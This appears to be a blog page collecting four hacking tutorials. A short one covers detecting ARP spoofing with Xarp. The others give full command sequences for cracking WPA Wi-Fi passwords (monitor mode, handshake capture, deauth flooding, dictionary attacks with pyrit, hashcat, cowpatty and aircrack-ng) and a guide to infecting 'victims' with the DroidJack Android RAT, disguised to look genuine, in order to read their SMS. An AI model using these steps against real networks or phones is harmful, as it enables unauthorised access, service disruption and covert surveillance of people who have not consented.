How to Detect Sniffer on Your Network

Xarp is an advanced anti spoofing tool that flags all the spoofing attacks that might be using ARP(address resolution protocol) targeting your system. This includes documents, emails and VoiceIP conversations.  ARP attacks allows hacker to manipulate the data sent over the network. Xarp uses active and passive modules to detect hackers inside the network. Having such tools in the system is very important as the computer firewalls and OS security do not provide protection against ARP attacks.

Download latest Xarp version from http://xarp.software.informer.com/download/

After it gets downloaded, install it in your computer. Now,we will perform an attack on a system with Xarp installed  To show this tool’s effectiveness, we perform the attack with Bettercap

As soon as Xarp detects an ARP attack, it shows an alert on the screen like this.

 It is to be noted that there was no such alert or blocking from both windows firewall and defender, but Xarp detects the intrusion and warns about it.

Author- Shivam Yadav is a certified ethical hacker, an enthusiast and a researcher in this field.

3 Ways to Crack Wifi using Pyrit, oclHashcat and Cowpatty

First start the monitor mode on our wireless adaptor .

airmon-ng start wlan0

Now the monitor mode is enabled with name wlan0mon.

and then with the following command start listening to all the available wifi connections:

airodump-ng wlan0mon

After running the above command it will start listening all the wifi traffic nearby so wait till your target appears and then hit ctrl^c.

Now we have to listen to a specific channel on which the target is present . Now run command:

airodump-ng -c 2 –bssid 3C:1E:04:XX:XX:XX –write sommay wlan0mon

-c == channel number of the target (2 in my case , see the CH column)

–bssid == MAC address of the target AP

–write == name of the capture file

Now wait till the WPA handshake is captured and then hit crtl^c.

Now a file named sommay-01.cap will be generated

PYRIT

First method to crack the password from the capture file is PYRIT . We will use dictionary-attack so run command:

pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough

-i == path to the input file in our case  it is the path to dictionary

-r ==  path to the captured fle which ( in our case it is sommay-01.cap)

attack_passthrough == this options is to specify that a dictionary attack is to be performed

As you can see it has successfully cracked the password.

OCLHASHCAT

First of all download oclhashcat from its official website: https://hashcat.net/files/hashcat-2.00.7z

First we have to convert the .cap file we captured with airodump-ng previously  to .hccap with aircrack-ng  by command:

aircrack-ng sommay-01.cap -J sommay-01

-J == the path to the output file with extension .hccap

Now copy the dictionary you want to use in the Hashcat folder. Now enter in the hashcat folder and run command:

./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst

In above command if you are using 32 bit system replace 64 with 32.

-m is the hash type  which is 2500 for WPA/WPA2 cracking

then give the path to .hccap file which you converted with aircrack-ng. and then the name of the dictionary file. As you can see it has successfully cracked the password.

COWPATTY

For cracking with the help of cowpatty we have to first generate the hash file specific to the target AP. For this we will use genpmk so run command:

genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY

-f == path to the dictionary file

-d == name of the output dictionary

-s == ESSID(Name) of the target AP(The name should be identical to the target AP)

Now it will generate a dictionary file named cowpatty_dict which will speed up the cracking process.

Now run command :

cowpatty  -d cowpatty_dict -r sommay-01.cap -s SOMMAY

-d == path to dictionary we generated with genpmk

-r == path to the capture file we generated with airodump-ng

-s == ESSID of the target AP(The name should be identical to the target AP)

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .

Crack Wifi Password using Aircrack-Ng (Beginner’s Guide)

This is the classical method of wireless password cracking .All the tools use this method in one way or other.

First start the monitor mode which will listen to all the wifi connections nearby with command:

airmon-ng start wlan0

In your lower right corner you will see written. monitor mode enabled for [phy1]wlan0mon

Now run the following command to confirm that our wifi adaptor is in monitor mode, so run command:

ifconfig

which will show you the wifi adaptor as wlan0mon meaning adaptor is in monitor mode.

Now run command:

airodump-ng wlan0mon

The above command will start listening to all the available wifi connections.

Now when your target appeas hit ctrl^c and then to capture the handshake type command:

airodump-ng -c 7 –bssid C8:XX:35:XX:FD:F0  –write 1 wlan0mon

Here,

 -c is the channel no. of the AP which will be listed in CH column in the output of above command as in my case it is 7.

–bssid is the MAC address of the target AP as in my case it is rajlab and bssid is  C8:3A:XX:44:XX:F0

–write is the capture file in which the capture packets will be saved as in my case i have named it as 1

Option Description
-c The channel for the wireless network
–bssid The MAC address of the access point
-w The file name prefix for the file which will contain authentication handshake
mon0 The wireless interface

Now start the deauth attack to disconnect all the connected clients to that AP which will help in capturing the handshake with command:

aireplay-ng -0 100 –a XX:3A:35:XX:FD:F0  -e rajlab wlan0mon

Here,

-0 is used for deauth attack

100 is no. of deauth packets to be sent

-a is the target AP MAC address

-e is ESSID of the target AP i.e. name of the target AP 

After launching the deauth attack we will get the WPA handshake in the previous terminal window in the top right corner then hit ctrl^c.

Now we have to crack the password with aircrack-ng so type command :

aircrack-ng 1-01.cap –w /usr/share/nmap/nselib/data/passwords.lst

Here,

1-01.cap is the capture file we generated in the airodump-ng .

-w is the dictionary to be used to perform dictionary attack

In my case the key is found as KEY FOUND! [raj123987]

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him on LinkedIn .

Hack Any Android Phone with DroidJack (Beginner’s Guide)

DroidJack is an android RAT which gives you the power to establish control over your victim’s Android devices with an easy to use GUI and all the features you need to monitor them.

First of all download DroidJack  from http://droidjack.net

Now execute the DroidJack which is a executable jar file . Then it will prompt you for login , so enter your username and password .

Now clicking on unlock button will open a GUI interface .

Now click on Generate APK and then edit App Name and File Name with the name of your choice so that it looks genuine. Also enter the IP of your system in the Dynamic DNS field and enter the port no. of your system in the Port Number field and then click on Generate.

After some time it will generate a prompt showing that the APK is successfully generated and can be found in the same folder as your DroidJack application.

So now go to Devices and set the port field in the lower left corner to the same port with which you have generated the APK as in my case it is 1337 and then click on Reception  to start the listening mode.

Now send the apk RAT to your victim by any means .

After installing the app ,when the victim click on button we will get the android session. 

As you can see below the phone is  listed in Devices list.

Now right clicking on the mobile device will give a list of options which you can use.

Now for demo purpose i  have used SMS  Trekker and as you can see it has dumped all the SMS.

AUTHOR: Sahil Gujjar is an information security enthusiast and technical writer

Related Posts Plugin for WordPress, Blogger...